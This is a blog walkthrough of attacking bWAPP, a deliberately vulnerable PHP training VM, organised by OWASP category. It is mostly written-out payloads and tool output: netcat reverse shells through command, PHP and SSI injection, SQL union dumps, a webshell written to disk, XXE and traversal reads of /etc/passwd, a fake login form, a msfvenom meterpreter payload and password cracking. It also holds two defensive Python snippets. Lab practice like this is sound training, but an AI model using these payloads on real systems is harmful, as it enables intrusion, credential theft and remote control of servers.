bWAPP Practice



Introduction

VM download: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/

If you want to deploy the environment yourself: https://sourceforge.net/projects/bwapp/files/bee-box/

bWAPP contains over 100 vulnerabilities, including the OWASP Top 10 security risks; a very satisfying PHP web target.

Login username: bee  password: bug    The vulnerability level can be set to raise the difficulty: low -> medium -> high.


For details, consult the relevant documentation; let's have fun taking down the little bee.

0x001 Reconnaissance

Whatever else, recon the VM first; the basic routine is to take out Nmap and give it a scan.

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           ProFTPD 1.3.1
22/tcp   open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 45:a4:66:ec:3a:ba:97:f8:3e:1a:ba:1c:24:68:22:e8 (DSA)
|_  2048 63:e7:c5:d1:8d:8a:94:02:36:6a:d7:d2:75:e9:8b:ce (RSA)
25/tcp   open  smtp          Postfix smtpd
|_smtp-commands: bee-box, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
80/tcp   open  http          Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp  open  ssl/https?
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
445/tcp  open  netbios-ssn   Samba smbd 3.0.28a (workgroup: ITSECGAMES)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
666/tcp  open  doom?
| fingerprint-strings: 
|   GenericLines, beast2: 
|     *** bWAPP Movie Service ***
|_    Matching movies: 0
3306/tcp open  mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5901/tcp open  vnc           VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    VNC Authentication (2)
6001/tcp open  X11           (access denied)
8080/tcp open  http          nginx 1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: Site doesn't have a title (text/html).
8443/tcp open  ssl/https-alt nginx/1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| tls-nextprotoneg: 
|_  http/1.1
9080/tcp open  http          lighttpd 1.4.19
|_http-server-header: lighttpd/1.4.19
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host:  bee-box; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -26d19h39m59s, deviation: 29m59s, median: -26d19h25m00s
|_nbstat: NetBIOS name: BEE-BOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: bee-box
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: bee-box
|_  System time: 2018-11-07T11:27:32+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

With a basic understanding in hand, let's start practicing the vulnerabilities.

0x002 A1 Injection

1.HTML Injection – Reflected (GET)  

Check whether the form uses GET or POST: open the browser, press F12, view the page source and search for First name:. To replay data conveniently, use Burp Suite.

<form action="/bWAPP/htmli_get.php" method="GET">

Injecting an HTML <a> tag: <a href=http://www.baidu.com>点此领取奖励</a>

<a href=http://www.baidu.com>点此领取奖励</a> #low
<script>alert(document.cookie)</script> #js cookie theft; you can extend this idea further, all roads lead to Rome

At the medium level the injection no longer works; try URL-encoding the payload. The high level still cannot be bypassed; I'm not very familiar with PHP.

<a href=http://www.baidu.com>点此领取奖励</a>
# URL-encoded
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E
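Why the encoded payload gets through at medium, and what the fix looks like, as an added illustration that is not code from bWAPP or from the original post: the naive handler is a constructed stand-in that escapes angle brackets and only then URL-decodes, so the once-encoded value the handler receives (the server has already decoded the double-encoded POST body from the request above once) turns back into markup; the hardened handler decodes to a fixed point first and escapes at the output boundary.

```python
import html
from urllib.parse import unquote

# Constructed sample input: the once-encoded payload from the write-up, i.e.
# what a handler sees after the web server has URL-decoded %253C... one time.
ENCODED_PAYLOAD = ("%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E"
                   "%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E")


def naive_render(firstname: str) -> str:
    """Hypothetical medium-style handler (assumption, not bWAPP's code):
    escapes < and > first, then URL-decodes. The order is reversed, so
    encoded brackets are reintroduced after the escaping step."""
    escaped = firstname.replace("<", "&lt;").replace(">", "&gt;")
    return "Welcome " + unquote(escaped)


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Decode until nothing changes, so double-encoded %253C is caught too.
    Inputs that are still changing after max_rounds are rejected outright."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("input still decoding after max_rounds; rejecting")


def safe_render(firstname: str) -> str:
    """Canonicalise (decode) first, then HTML-escape at the output boundary.
    Whatever encoding the client used, the browser only ever sees text."""
    return "Welcome " + html.escape(fully_decode(firstname), quote=True)


def contains_markup(rendered: str) -> bool:
    """Helper for checking a rendered fragment for live tags."""
    return "<" in rendered or ">" in rendered
```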

2.HTML Injection – Reflected (POST)

<a href=http://www.baidu.com>点此领取奖励</a> #low
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E #medium

For high the only way to cheat is to modify the data.... utterly shameless!!!

POST /bWAPP/htmli_post.php HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.104/bWAPP/htmli_post.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Cookie: PHPSESSID=f4fdf1cde23c464faf2f2d13c926dcf2; security_level=2 #change to 1 or 0
Connection: close
Upgrade-Insecure-Requests: 1

firstname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&lastname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&form=submit

3.HTML Injection – Reflected (URL)

#low the reflected URL can be modified arbitrarily
GET /bWAPP/htmli_current_url.php#<script>alert(document.cookie)</script>  HTTP/1.1
Host: 192.168.1.104 #the IP address can be changed to anything

4.HTML Injection – Stored (Blog)

<a href=http://www.baidu.com>点此领取奖励</a> #low arbitrary code can be written in and executed
#fake login form
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.101 /login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

5.iFrame Injection

#low
ParamUrl=https://www.baidu.com&ParamWidth=1000&ParamHeight=1000 
ParamUrl=robots.txt" onload="alert(document.cookie)
"></iframe><script>alert(document.cookie);</script>

6.LDAP Connection Settings

#not configured, you need to set it up yourself
sudo apt-get install slapd ldap-utils
sudo apt-get install phpLDAPadmin #install the web interface

clear=* #injection

7.Mail Header Injection (SMTP)

test@domain.com%0ACc:test@domain.com,%0ABcc:test@domain.com

8.OS Command Injection

#low
; whoami

www.nsa.gov && nc -vn  192.168.1.101 4444 -e /bin/bash  

#listener
nc -lvp 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 51213
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

#medium
www.nsa.gov | nc -vn  192.168.1.101 4444 -e /bin/bash

At high it is hard to bypass; bring out the tools, too much hassle otherwise, just hit it directly

commix --url="http://192.168.1.104/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=4a7c070b665d8d0db8ce2b02941a6a0c" --data=target="192.168.1.101&form=submit"

9.OS Command Injection – Blind

#low
127.0.0.1 && nc -vn  192.168.1.101 4444 -e /bin/bash
#high  just use commix directly

10.PHP Code Injection

#low
phpi.php?message=test;phpinfo()
message=test;system('nc -vn  192.168.1.101 4444 -e /bin/bash')
#you can also run wget http:// to download a trojan and get a shell directly; this is stealthier than the Swiss army knife and a reverse shell

11.Server-Side Includes (SSI) Injection

#low
<!--#exec cmd="nc 192.168.1.101 4444 -e /bin/bash" -->

#receiver
nc -nlvp 4444

12.SQL Injection (GET/Search)

#low
sqli_1.php?title='+'&action=search
Iron Man' or 1=1 #
sqli_1.php?title=Iron+Man'+order+by+7+--+-&action=search
Iron Man' union select 1,2,3,4,5,6,7 #
iron' union select 1,user(),@@version,4,5,6,7 #

iron' union select 1,login,password,email,5,6,7 from users #

#the obtained password hashes can be cracked
john --format:raw-sha1 /root/password.txt --show
?:bug

1 password hash cracked, 0 left


iron' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",3,4,5,6,7 into OUTFILE
'/var/www/bWAPP/tmp.php' #
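The tautology and union payloads above work because the title parameter is spliced straight into the SQL text. Added example, not code from bWAPP or the original post: a constructed in-memory sqlite stand-in for the movies table (schema and rows assumed) compares the concatenated query with a bound-parameter query; sqlite has no `#` comment, so the write-up's `-- -` terminator is used instead.

```python
import sqlite3

# Constructed stand-in for bWAPP's movies table: schema and rows are assumed.
MOVIES = [
    (1, "Iron Man", 2008),
    (2, "The Incredible Hulk", 2008),
    (3, "Thor", 2011),
]


def make_db() -> sqlite3.Connection:
    """Build the in-memory sample database."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, release_year INTEGER)"
    )
    con.executemany("INSERT INTO movies VALUES (?, ?, ?)", MOVIES)
    return con


def search_vulnerable(con: sqlite3.Connection, title: str) -> list:
    """String-concatenated search: user input becomes part of the SQL text,
    so a quote closes the literal and the rest is parsed as SQL."""
    sql = "SELECT id, title FROM movies WHERE title LIKE '%" + title + "%'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, title: str) -> list:
    """Bound parameter: the whole value is data, the SQL text is fixed, so
    an injection attempt is just an unusual title that matches nothing."""
    return con.execute(
        "SELECT id, title FROM movies WHERE title LIKE ?", ("%" + title + "%",)
    ).fetchall()


def run_demo() -> tuple:
    """Return (rows from vulnerable query, rows from safe query) for the
    write-up's tautology payload against the same database."""
    con = make_db()
    payload = "Iron Man' or 1=1 -- -"   # tautology from the write-up, sqlite comment form
    return len(search_vulnerable(con, payload)), len(search_safe(con, payload))
```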

13.SQL Injection (GET/Select)

movie=1 union select 1,2,3,4,5,6,7#&action=go
movie=67 union select 1,login,3,email,password,6,7 from users#&action=go

14.SQL Injection (POST/Search)

POST submits the parameters, same principle
AJAX, simply put, queries as soon as you type the input; same principle as GET/POST injection
AJAX comes in synchronous and asynchronous forms

' '
1' union select 1,2,3,4,5,6,7#

1' union select 1,login,3,email,password,6,7 from users#

15.SQL Injection – Stored (XML)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
  <login>&test;</login>
  <secret>login</secret>
</rest>

#view the data in Burp

SqlMap: dumping the database

sqlmap -u "http://192.168.1.104/bWAPP/sqli_1.php?title=1&action=search" --cookie="PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c; security_level=0" --dbs


available databases [4]:
[*] bWAPP
[*] drupageddon
[*] information_schema
[*] mysql

--current-db
[20:39:37] [INFO] fetching current database
[20:39:37] [INFO] retrieved: bWAPP
current database:    'bWAPP'

--current-user

[20:41:07] [INFO] fetching current user
[20:41:07] [INFO] retrieved: root@localhost
current user:    'root@localhost'

--users
database management system users [7]:
[*] ''@'bee-box'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'bee-box'
[*] 'root'@'localhost'


--passwords
cracked password 'bug' for user 'root' #stopped it here, didn't let it keep running

-D bWAPP --tables

[20:46:22] [INFO] fetching tables for database: 'bWAPP'
[20:46:23] [INFO] used SQL query returns 5 entries
[20:46:23] [INFO] retrieved: blog
[20:46:23] [INFO] retrieved: heroes
[20:46:23] [INFO] retrieved: movies
[20:46:23] [INFO] retrieved: users
[20:46:23] [INFO] retrieved: visitors
Database: bWAPP
[5 tables]
+----------+
| blog     |
| heroes   |
| movies   |
| users    |
| visitors |
+----------+

-D bWAPP -T users --columns
Database: bWAPP
Table: users
[9 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| activated       | tinyint(1)   |
| activation_code | varchar(100) |
| admin           | tinyint(1)   |
| email           | varchar(100) |
| id              | int(10)      |
| login           | varchar(100) |
| password        | varchar(100) |
| reset_code      | varchar(100) |
| secret          | varchar(100) |
+-----------------+--------------+

-D bWAPP -T users -C password --dump

Database: bWAPP                                                                
Table: users
[2 entries]
+------------------------------------------------+
| password                                       |
+------------------------------------------------+
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
+------------------------------------------------+

--dump-all   #dump the whole database

#cracking passwords locally is too time-consuming; push it to a server and let it run there.

0x003. A2 – Broken Auth. & Session Mgmt

1.Broken Auth. – CAPTCHA Bypassing

#brute force with Burp Intruder

login=§test§&password=§123456§&captcha_user=zq9mso&form=submit

2.Broken Auth. – Forgotten Function

email=§12312414%40163.com§&action=forgot  #brute-force

3.Session Mgmt. – Administrative Portals

admin=1

4.Session Mgmt. – Cookies (Secure)

security_level=0; top_security=no<script>alert(1)</script>
Connection: close

5.Session Mgmt. – Session ID in URL

smgmt_sessionid_url.php?PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c

0x004. A3 – Cross-Site Scripting (XSS)

1.XSS – Reflected (GET) (POST)

<script>alert(document.cookie)</script>

2.XSS – Reflected (JSON)

<svg onload=prompt(0)>

3.XSS – Reflected (AJAX/JSON)

<img src=1 onerror=alert(1) />

4.XSS – Reflected (Back Button)

Referer: ';alert(1);'

5.XSS – Reflected (Custom Header)

bWAPP: <script>alert(1)</script>

6.XSS – Reflected (Eval)

date=alert(1)

7.XSS – Reflected (HREF)

Referer: <script>alert(1)</script>

8.XSS – Reflected (User-Agent)

User-Agent: <script>alert(1)</script>

0x005. A4 – Insecure Direct Object References

1.Insecure DOR (Change Secret)

secret=1&login=test&action=change

2.Insecure DOR (Reset Secret)

<reset><login>bee</login><secret>Any bugs?</secret></reset> #can be changed arbitrarily

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
  <login>&test;</login>
  <secret>login</secret>
</rest>

3.Insecure DOR (Order Tickets)

ticket_quantity=1&ticket_price=15&action=order #modify the hidden field

#many price bugs come from the price not being obfuscated at all; even when it is obfuscated, you can still test by submitting fractional values

0x006.  A5 – Security Misconfiguration

1.Arbitrary File Access (Samba)

msf exploit(unix/misc/distcc_exec) > set rhost 192.168.1.104
rhost => 192.168.1.104
msf exploit(unix/misc/distcc_exec) > exploit 

[*] Started reverse TCP double handler on 192.168.1.101:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vbyqH8dKW4KUZQNS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vbyqH8dKW4KUZQNS\r\n"
[*] Matching...
[*] B is input...

id
uid=0(root) gid=0(root) groups=0(root)

Enumerate with enum4linux

#detailed usage: https://labs.portcullis.co.uk/tools/enum4linux/
enum4linux -S 192.168.1.104 #you can also just append the IP for detailed information gathering
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Dec  7 17:43:26 2018

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.104    |
 ===================================================== 
[+] Got domain/workgroup name: ITSECGAMES

 ====================================== 
|    Session Check on 192.168.1.104    |
 ====================================== 
[+] Server 192.168.1.104 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.104    |
 ============================================ 
Domain Name: ITSECGAMES
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================== 
|    Share Enumeration on 192.168.1.104    |
 ========================================== 

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
	opt             Disk      
	tmp             Disk      oh noes!
	print$          Disk      Printer Drivers
	Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
	Snagit_9:6      Printer   Snagit 9
	Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
	PDF             Printer   PDF
	Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
	HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
	Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
	Fax:2           Printer   Fax
	CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	ITSECGAMES           BEE-BOX
	WORKGROUP            FREE

[+] Attempting to map shares on 192.168.1.104
//192.168.1.104/IPC$	[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.104/opt	Mapping: DENIED, Listing: N/A
//192.168.1.104/tmp	Mapping: OK, Listing: OK
//192.168.1.104/print$	Mapping: DENIED, Listing: N/A
//192.168.1.104/Xerox_Phaser_8500DN_PS:7	Mapping: DENIED, Listing: N/A
//192.168.1.104/Snagit_9:6	Mapping: DENIED, Listing: N/A
//192.168.1.104/Send_To_OneNote_2010:8	Mapping: DENIED, Listing: N/A
//192.168.1.104/PDF	Mapping: DENIED, Listing: N/A
//192.168.1.104/Microsoft_XPS_Document_Writer:1	Mapping: DENIED, Listing: N/A
//192.168.1.104/HP_Officejet_6500_E710a-f_(Network):5	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax_-_HP_Officejet_6500_E710a-f_(Network):4	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax:2	Mapping: DENIED, Listing: N/A
//192.168.1.104/CutePDF_Writer:3	Mapping: DENIED, Listing: N/A
enum4linux complete on Fri Dec  7 17:43:27 2018

smbclient -L 192.168.1.104

Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
	opt             Disk      
	tmp             Disk      oh noes!
	print$          Disk      Printer Drivers
	Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
	Snagit_9:6      Printer   Snagit 9
	Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
	PDF             Printer   PDF
	Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
	HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
	Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
	Fax:2           Printer   Fax
	CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	ITSECGAMES           BEE-BOX

Upload a file

smbclient \\\\192.168.1.104\\tmp -c "put test"

0x007

1.HTML5 Web Storage (Secret)

if(typeof(Storage) !== "undefined")
{

    localStorage.login = "bee";
    localStorage.secret = "1";
    alert(localStorage.login);
    alert(localStorage.secret);

}

2.Directory Traversal – Directories

?directory=../../../../var/www/

3.Directory Traversal – Files

?page=../../../../../etc/passwd

4.Host Header Attack (Cache Poisoning)

GET /bWAPP/hostheader_1.php HTTP/1.1
Host: www.baidu.com

5.Remote & Local File Inclusion (RFI/LFI)

?language=../../../../etc/passwd&action=go

?language=http://www.baidu.com

6.Restrict Device Access

Mozilla/5.0(iPhone;U;CPUiPhoneOS4_0likeMacOSX;en-us)AppleWebKit/532.9(KHTML,likeGecko) Version/4.0.5Mobile/8A293Safari/6531.22.7

7.XML External Entity Attacks (XXE)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY popped SYSTEM "file:///etc/passwd">
]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>

8.CSRF (Change Password)

?password_new=123&password_conf=123&action=change

9.PHP Eval Function

php_eval.php?eval=echo shell_exec("cat /etc/passwd");

10.Unrestricted File Upload

#low
weevely generate 123456 shell.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e php/base64 -f raw > shelltmp.php


#high 
Remote & Local File Inclusion (RFI/LFI) 
rlfi.php?language=images/shelltmp.php.png

Summary:

Only black-box testing was done on this target, with no source code analysis. I have not studied PHP much and am still rather lazy. Kali Linux tools were used for the penetration; tool scans produce false positives and miss many vulnerabilities. Tools are only an aid: findings still need manual re-confirmation, and the underlying principles need further study and practice.


Published by: 全栈程序员-用户IM; when reposting please cite the source: https://javaforall.cn/190140.html Original link: https://javaforall.cn
